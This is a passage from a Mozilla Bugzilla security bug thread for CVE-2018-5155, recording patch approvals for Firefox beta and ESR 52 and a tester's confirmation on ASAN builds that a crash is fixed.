Attachment #8962526 - Flags: approval-mozilla-esr52?
Attachment #8962526 - Flags: approval-mozilla-beta?
Comment on attachment 8962526 [details] [diff] [review]
The parts of the dholbert reviewed patch above that apply to all branches (nightly/beta/ESR)

Approved for 60.0b9 and ESR 52.8.
Attachment #8962526 - Flags: approval-mozilla-esr52?
Attachment #8962526 - Flags: approval-mozilla-esr52+
Attachment #8962526 - Flags: approval-mozilla-beta?
Attachment #8962526 - Flags: approval-mozilla-beta+
Group: layout-core-security → core-security-release
Flags: qe-verify+
I've managed to reproduce this crash using the testcase from comment 2, on an affected ASAN Nightly build (61.01, 20180326091918).

This is verified fixed on the latest ASAN builds: Beta 60.0b10 (20180405001308), Nightly 61.0a1 (20180405001308) running Ubuntu 16.04 x64.

Ni myself to verify this on esr 52.8.0 as well.
Status: RESOLVED → VERIFIED
Flags: needinfo?(ciprian.georgiu)
Flags: sec-bounty?
Blocks: 1446650
Flags: sec-bounty? → sec-bounty+
Whiteboard: [adv-main60+][adv-esr52.8+]
Flags: needinfo?(ciprian.georgiu)
This crash is also verified fixed on 52.8.0esr (20180429211418) ASAN build, under Ubuntu 16.04 x64.
Flags: qe-verify+
Alias: CVE-2018-5155
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.